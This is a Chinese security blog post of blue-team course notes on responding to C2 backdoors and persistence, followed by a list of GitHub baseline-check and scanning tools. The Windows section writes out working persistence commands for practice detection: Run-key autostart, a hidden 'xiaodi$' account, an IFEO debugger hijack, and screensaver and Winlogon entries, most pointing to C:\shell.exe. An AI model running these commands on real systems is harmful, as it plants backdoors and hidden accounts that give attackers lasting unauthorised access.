蓝队技能-应急响应篇&C2后门&权限维持手法&Windows&Linux基线检查&排查封锁清理

Ethan医生5个月前 (05-25)信息收集184

➢ 蓝队技能-Web入侵-入口&查杀&攻击链等

➢ 蓝队技能-C2后门&权限维持-基线检查&查杀封锁

#C2后门分析处置&权限维持技术处置

#Windows实验：

1、常规C2后门-分析检测

常规C2后门：

-无隐匿手法

删除文件，防火墙阻止程序或IP域名等

-有隐匿手法

CDN，云函数，中转等（溯源和反制）

2、Rookit后门-分析检测

后续课程讲到

3、权限维持技术-分析检测

自启动测试：

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"

隐藏账户：

net user xiaodi$ xiaodi!@#X123 /add

映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"

屏保&登录

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"

4、Web的内存马-分析检测

后续课程讲到

Linux实验：

1、常规C2后门-分析检测

常规C2后门：

-无隐匿手法

删除文件，防火墙阻止程序或IP域名等

-有隐匿手法

CDN，云函数，中转等（溯源和反制）

2、Rookit后门-分析检测

后续课程

3、权限维持技术-分析检测

4、Web的内存马-分析检测

后续课程

基线检测配合分析项目：

-Windows:

https://github.com/selinuxG/Golin

https://github.com/m-sec-org/d-eyes

d-eyes可以查看挖矿家族与勒索病毒

https://github.com/FindAllTeam/FindAll

有两个檔案一个客户端一个服务端使用

https://github.com/DeEpinGh0st/WindowsBaselineAssistant

-Linux:

https://github.com/selinuxG/Golin

https://github.com/m-sec-org/d-eyes

https://github.com/enomothem/Whoamifuck (不推荐使用)

https://github.com/Ashro-one/Ashro_linux(不推荐使用)

https://github.com/sun977/linuxcheckshoot

https://mp.weixin.qq.com/s/fcVMStVXu0BploXWopaHtQ

返回列表

上一篇：JS逆向-安全辅助项目&接口联动&JSRpc进阶调用&BP插件autoDecode&JsEncrypter(下)

下一篇：内网对抗-横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用

蓝队技能-报告书写篇&红蓝队&云函数域前置溯源反制&渗透测试&值守日报&安全简历模版

➢ 红蓝队技能-报告书写-渗透测试&值守日报&安全简历漏洞风险报告https://github.com/s1g0day/ShitReport 渗透测试报告启动环境：...

蓝队技能-应急响应篇&钓鱼攻击&邮件与文件&EML还原&蠕虫分析&线索定性&处置封锁

➢ 蓝队技能-钓鱼攻击-邮件&附件&分析&排查&应急#钓鱼邮件如何分析邮件安全性：1、看发信人地址2、看发信内容信息3、看发信内容附件4、查询发信域名反制&n...

漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取

#Nuclei-Poc开发-环境配置&编写流程1、开发环境：Vscode+Yaml插件https://code.visualstudio.com/2、开发文档参考资料：https://docs...

红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

➢ 红队APT-近源攻击-BadUSB-上线C2#BADUSB准备工作：1、购买badusb，购买链接：https://detail.tmall.com/item.htm?id=606447...

红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书

➢ 红队APT-文件后缀-钓鱼伪装-RLO➢ 红队APT-电子书-CHM-加载JS&PS➢ 红队APT-快捷方式-LNK-加载&HTA➢ 红队A...

内网对抗-横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件

➢ 横向移动-WMI服务-条件&明文&HASH➢ 横向移动-SMB服务-条件&明文&HASH➢ 横向移动-DCOM服务-条件&明文...

EthanDoctor

蓝队技能-应急响应篇&C2后门&权限维持手法&Windows&Linux基线检查&排查封锁清理

相关文章

蓝队技能-报告书写篇&红蓝队&云函数域前置溯源反制&渗透测试&值守日报&安全简历模版

蓝队技能-应急响应篇&钓鱼攻击&邮件与文件&EML还原&蠕虫分析&线索定性&处置封锁

漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取

红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书

内网对抗-横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件

发表评论

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号

EthanDoctor

蓝队技能-应急响应篇&C2后门&权限维持手法&Windows&Linux基线检查&排查封锁清理

相关文章

蓝队技能-报告书写篇&红蓝队&云函数域前置溯源反制&渗透测试&值守日报&安全简历模版

蓝队技能-应急响应篇&钓鱼攻击&邮件与文件&EML还原&蠕虫分析&线索定性&处置封锁

漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取

红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书

内网对抗-横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件

发表评论 取消回复

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号

发表评论